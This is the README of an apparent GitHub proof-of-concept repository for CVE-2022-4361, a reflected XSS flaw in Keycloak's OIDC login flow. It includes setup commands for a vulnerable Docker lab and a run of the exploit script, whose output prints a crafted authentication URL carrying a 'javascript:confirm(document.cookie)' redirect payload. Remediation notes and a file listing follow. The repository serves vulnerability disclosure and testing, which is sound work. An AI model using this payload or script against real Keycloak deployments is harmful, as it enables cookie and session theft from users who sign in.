PoC for https://nvd.nist.gov/vuln/detail/CVE-2022-4361# CVE-2022-4361
## Description
This repository contains a PoC for [CVE-2022-4361](https://nvd.nist.gov/vuln/detail/CVE-2022-4361). <br>
All the credits go to original author of the discovery, [mulliken](https://bugzilla.redhat.com/show_bug.cgi?id=2151618);
**IMPORTANT**: this PoC is not complete as it does not cover the case for the `AssertionConsumerServiceURL` value on the SAML authentication protocol. Currently, only the OIDC case is covered.
## Steps
1. Clone this repo.
```shell
git clone https://github.com/faccimatteo/CVE-2022-4361.git && cd ./CVE-2022-4361
```
2. Set up a vulnerable Keycloak version using Docker Compose.
```shell
docker compose up -d
```
Wait until the infrastructure is available and reachable.
Since in this PoC Keycloak is not integrated with any web application, it is necessary to specify the full Keycloak authentication URL (once the test realm has been correctly set up).
The vulnerability on this test environment can be tested with the following URL.
```shell
python3 ./CVE-2022-4361.py --url http://localhost:8080/realms/test-realm/protocol/openid-connect/auth\?client_id\=test-client\&redirect_uri\=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Ftest-realm%2Faccount%2F%23%2F\&state\=f0cd8010-72b1-476d-823a-b72e2106db1d\&response_mode\=fragment\&response_type\=code\&scope\=openid\&nonce\=eb117e13-b09e-49b1-a086-3ebb69d6ca3d\&code_challenge\=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w\&code_challenge_method\=S256
[+] Detected Keycloak OIDC configuration in the authentication flow for http://localhost:8080/realms/test-realm/protocol/openid-connect/auth?client_id=test-client&redirect_uri=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Ftest-realm%2Faccount%2F%23%2F&state=f0cd8010-72b1-476d-823a-b72e2106db1d&response_mode=fragment&response_type=code&scope=openid&nonce=eb117e13-b09e-49b1-a086-3ebb69d6ca3d&code_challenge=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w&code_challenge_method=S256.
[+] Crafted malicious Keycloak authentication URL: http://localhost:8080/realms/test-realm/protocol/openid-connect/auth?client_id=test-client&redirect_uri=javascript:confirm(document.cookie)&state=f0cd8010-72b1-476d-823a-b72e2106db1d&response_mode=form_post&response_type=code&scope=openid&nonce=eb117e13-b09e-49b1-a086-3ebb69d6ca3d&code_challenge=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w&code_challenge_method=S256
[+] The Keycloak instance used by the target is likely to be VULNERABLE to CVE-2022-4361!
[*] Opening malicious login page in your default web browser...
```
A browser window will be opened with the malicious login page, as visible from the screenshot below.
Once a victim provide valid credentials (available in `keycloak-config/test-realm.json`) clicks on `Sign In` button, the reflected-XSS attack will be delivered. <br>
It is worth noticing that the attack is successful even if the victim has already logged inside the application.
## Remediation
- Make sure to upgrade Keycloak to a version > 21.1.1.
- Furthermore, make sure to never set the wildcard `*` value for `redirect_uri` in production environments.
## TODO
Currently, this PoC only covers the case of Keycloak being configured using an OIDC authentication flow. <br>
In the next deployments, the SAML authentication protocol will be introduced.
[4.0K] /data/pocs/006b6a9bb542bf91c383e9d5e9ef2ec4f39fd703
├── [4.1K] CVE-2022-4361.py
├── [ 889] docker-compose.yaml
├── [4.0K] img
│ ├── [107K] tampered-login-page.png
│ └── [ 60K] xss-delivered.png
├── [4.0K] keycloak-config
│ └── [ 656] test-realm.json
├── [ 11K] LICENSE
└── [3.3K] README.md
3 directories, 7 files